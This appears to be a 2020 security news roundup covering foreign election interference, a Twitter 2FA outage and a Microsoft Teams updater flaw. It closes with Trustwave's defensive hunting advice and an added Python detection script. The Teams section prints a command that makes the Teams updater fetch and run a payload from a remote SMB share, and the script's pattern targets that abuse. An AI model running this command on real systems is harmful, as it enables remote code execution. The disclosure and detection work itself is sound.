With only three months left before U.S. voters head to the polls, the U.S. Intelligence Community (IC) is sounding the alarm about election security and interference from Russia, Iran and China. Meanwhile, Twitter and Microsoft Teams are contending with vulnerabilities that could open the door to hackers.
Threats Abound Ahead of 2020 U.S. Presidential Election
Following the vulnerability disclosure policy for American voters announced at Black Hat USA 2020 by Election Systems & Software (ES&S), the U.S. National Counterintelligence and Security Center (NCSC) released a statement on Friday outlining the biggest threats facing the U.S. elections. Both moves can be read as efforts to get relevant election security information out to U.S. citizens.
NCSC head William Evanina outlined three major threats, from China, Russia, and Iran, to the integrity of the 2020 U.S. presidential election. In November, President Trump will seek re-election against former Vice President Joe Biden.
The 2016 election was marred by controversy over suspected tampering and interference, mainly from Russia, with or without the help of technology. However, the report by special counsel and former FBI Director Robert Mueller did not establish that Trump had colluded with Russia. Now, the intelligence community has assessed that, besides Russia, China and Iran may also have a vested interest in the democratic process.
Interference could be achieved through cyber means to tamper with the voting process, steal confidential or sensitive data, and/or challenge the validity of the election outcome. On the non-cyber side, President Trump floated the idea of postponing the 2020 election, citing the risks of mail-in/postal ballots.
With Universal Mail-In Voting (not Absentee Voting, which is good), 2020 will be the most INACCURATE & FRAUDULENT Election in history. It will be a great embarrassment to the USA. Delay the Election until people can properly, securely and safely vote???
— Donald J. Trump (@realDonaldTrump) July 30, 2020
This suggestion was not well received by the opposition or by some members of Trump’s own party.
The NCSC statement read, “Many foreign actors have a preference for who wins the election, which they express through a range of overt and private statements; covert influence efforts are rarer. We are primarily concerned about the ongoing and potential activity by China, Russia, and Iran.”
The statement said China wants to oust the incumbent, President Trump, while Russia wants to keep him in power. The Trump administration’s policies toward Iran could drive the Middle Eastern country to spread disinformation online with an anti-incumbency goal, the release added.
The press release stated:
- “CHINA – We assess that China prefers that President Trump – whom Beijing sees as unpredictable – does not win reelection. China has been expanding its influence efforts ahead of November 2020 to shape the policy environment in the United States, pressure political figures it views as opposed to China’s interests, and deflect and counter criticism of China.”
- “RUSSIA – We assess that Russia is using a range of measures to primarily denigrate former Vice President Biden and what it sees as an anti-Russia “establishment.””
- “IRAN – We assess that Iran seeks to undermine U.S. democratic institutions, President Trump, and to divide the country in advance of the 2020 elections. Tehran’s motivation to conduct such activities is, in part, driven by a perception that President Trump’s reelection would result in a continuation of U.S. pressure on Iran in an effort to foment regime change.”
Dave Imbordino, Election Security Lead at the National Security Agency, said during a panel discussion Friday at DEF CON 2020, “There’s more people in the game. They’re learning from each other. Influence is a cheap game to get into now with social media. It doesn’t cost a lot of money. You can try to launder your narratives online through different media outlets. That’s something we’re laser-focused on as well.”
Twitter Faces 2FA Outage
Twitter is entangled in yet another security-related embroilment only weeks after it patched flaws in the Twitter for Android app. Users of the microblogging site were unable to log into their accounts on the web version of Twitter because of an interruption in authentication services: users did not receive the account verification codes that are normally sent by text message or phone call.
Users were locked out of their accounts for days. Those with two-factor authentication (2FA) enabled could not log in, since the outage affected verification code delivery (by text or by call).
I’m trying to access my account and it says I need to reset the password to be able to log in but then it won’t let me reset the password??? Please somebody help me. Thank you pic.twitter.com/S4V7muxmss
— TAG_ViperMan (@YouTubeViperMan) August 14, 2020
PLEASE UNLOCK @alrightdakota ITS BEEN STUCK LIKE THIS FOR HOURS DESPITE ME HAVING ACCESS TO BOTH EMAIL AND PHONE pic.twitter.com/pt8gUW6spu
— ash (@anakinftrey) August 13, 2020
There is a workaround for those locked out: users can still sign in with their backup/recovery code. The backup code is generated for everyone with 2FA enabled, and users are expected to memorize it or store it in a safe location. Twitter provisioned it precisely for the case where a user loses their phone or the network cannot deliver text- or call-based verification.
Users who have not yet generated a backup code can do so in the mobile apps by navigating to Settings and Privacy > Account > Security > Backup Code.
Twitter issued the following statement:
We have more work to do with fixing verification code delivery, but we’re making progress. We’re sorry for the frustration this has caused and appreciate your patience while we keep working on this. We hope to have it sorted soon for those of you who aren’t receiving a code.
— Twitter Support (@TwitterSupport) August 13, 2020
Trustwave Exposes Microsoft Teams Design Flaw
A security weakness in Microsoft Teams can allow threat actors to remotely deliver and execute arbitrary files. Initially discovered in 2019, the weakness allowed hackers to push a malicious package by exploiting a flaw in the collaboration application’s update command. Microsoft issued a fix, but Reegun Jayapaul, Lead Threat Architect at Trustwave SpiderLabs, found that the fix was not enough.
Jayapaul explained in a blog post, “The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.”
Jayapaul also discovered the original flaw last year. He found that while Microsoft’s patch prevents an attacker from delivering a malicious payload from an unrecognized URL, it can still be circumvented using the Server Message Block (SMB) protocol.
As Jayapaul’s screenshot showed, the Microsoft patch only allows the updater to fetch packages from local folders and local network shares.
While this raises the bar for the attacker, they can still accomplish their goal by placing the file(s) on an open, shared folder inside the network and having the updater fetch them from the target’s system. A Samba server can serve the same purpose, using the command:
Command: Update.exe --update=\\remoteserver\payloadFolder
This means the Teams updater qualifies as a LOLBin (a living-off-the-land binary) that can be abused for remote code execution without privileged access.
Jayapaul presented the proof of concept.
Microsoft Teams – Arbitrary code execution #lolbin #threathunt #dfir #blueteam #redteam pic.twitter.com/4d4FY2zf89
— Reegun J (@reegun21) August 5, 2020
Despite this discovery, Redmond responded to Trustwave that customer operational constraints prevent it from curbing SMB-sourced updates. The company said, “Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as “we cannot restrict SMB source for --update because we have customers that apparently rely on this (e.g. folder redirection).””
Trustwave issued the following recommendations to mitigate risks from LOLBin threats:
Trustwave Recommendations
From the threat-hunting perspective:
- Utilize EDR solutions and look at “update.exe” command lines for suspicious connections.
- Hunt for squirrel.exe executables and investigate the file size; it can be used to differentiate trojanized squirrels from the legitimate squirrel.exe.
- If you are dealing with Microsoft Teams “update.exe”, validate the size and hash and hunt for any anomalies.
- Investigate outgoing SMB connections, especially from the Microsoft Teams updater update.exe, or filter SMB connections entirely at the perimeter if they are unnecessary.
- Ask the customer or IT about any security exclusions placed for Microsoft Teams packages and review the changes applied.
- IT should install Microsoft Teams under the “Program Files” folder so an attacker cannot drop and execute the remote payload; this can be done through Group Policy.
- Disable any kind of update mechanism and set a policy that updates are pushed only by the IT team.
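One way to turn the hunting checks above into code, as an added example that is not Trustwave’s or Microsoft’s own: it runs the UNC-source, size, hash and install-location checks over process-creation events. The pipe-separated log format, the baseline sizes and hashes, and the sample events are all constructed for illustration.

```python
import re
from dataclasses import dataclass

# Known-good size and sha256 for the Teams updater binaries. CONSTRUCTED
# placeholders for this example; a real hunt takes them from a clean install.
KNOWN_GOOD = {"update.exe": (1_900_000, "aaaa1111"),
              "squirrel.exe": (1_900_000, "bbbb2222")}
# A Teams install under Program Files cannot be swapped out by a non-admin user.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
# --update= pointing at a UNC path means the package is fetched over SMB.
UNC_UPDATE = re.compile(r"--update=\s*(\\\\[^\s\"']+)", re.IGNORECASE)

@dataclass
class ProcEvent:
    image: str      # path of the executable that started
    size: int       # on-disk size of that executable
    sha256: str     # on-disk hash of that executable
    cmdline: str    # full command line

def parse_event(line: str) -> ProcEvent:
    # constructed EDR export format: image|size|sha256|cmdline
    image, size, sha256, cmdline = line.rstrip("\n").split("|", 3)
    return ProcEvent(image, int(size), sha256, cmdline)

def hunt(ev: ProcEvent) -> list:
    # Apply the hunting checks from the recommendations to one event.
    name = ev.image.rsplit("\\", 1)[-1].lower()
    if name not in KNOWN_GOOD:
        return []
    findings = []
    m = UNC_UPDATE.search(ev.cmdline)
    if m:
        findings.append(f"update source is an SMB share: {m.group(1)}")
    size, sha256 = KNOWN_GOOD[name]
    if ev.size != size:
        findings.append(f"{name} size {ev.size} differs from baseline {size}")
    if ev.sha256.lower() != sha256:
        findings.append(f"{name} hash differs from baseline")
    if not ev.image.lower().startswith(TRUSTED_DIRS):
        findings.append(f"{name} runs from a user-writable path")
    return findings

SAMPLE_LOG = [  # constructed events, not captured from any real host
    "C:\\Program Files\\Teams\\update.exe|1900000|aaaa1111|update.exe --processStart Teams.exe",
    "C:\\Users\\bob\\AppData\\Local\\Microsoft\\Teams\\update.exe|1900000|aaaa1111|"
    "update.exe --update=\\\\fileserver\\share\\pkg",
    "C:\\Users\\bob\\AppData\\Local\\Temp\\squirrel.exe|2400000|deadbeef|squirrel.exe --install .",
]
```

Running `hunt(parse_event(line))` over the sample gives no findings for the first event, an SMB-share plus user-writable-path finding for the second, and size, hash and path findings for the third.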